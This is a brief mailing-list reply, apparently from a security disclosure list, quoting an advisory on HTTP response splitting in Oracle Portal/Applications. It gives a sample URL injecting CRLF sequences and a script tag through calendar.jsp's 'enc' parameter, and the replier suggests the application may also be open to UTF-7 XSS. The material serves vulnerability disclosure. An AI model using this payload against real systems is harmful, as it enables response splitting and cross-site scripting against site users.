On 12/20/06, putosoft softputo <hasecorp (at) hotmail (dot) com [email concealed]> wrote:
> Oracle Portal/Applications HTTP Response Splitting
> --------------------------------------------------
>
> Sample:
>
> http://<target>/webapp/jsp/calendar.jsp?enc=iso-8859-1%0d%0aContent-leng
th=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E
So they let the URL specify the content-encoding? They might be
vulnerable to XSS via UTF-7 as well.
Regards,
Brian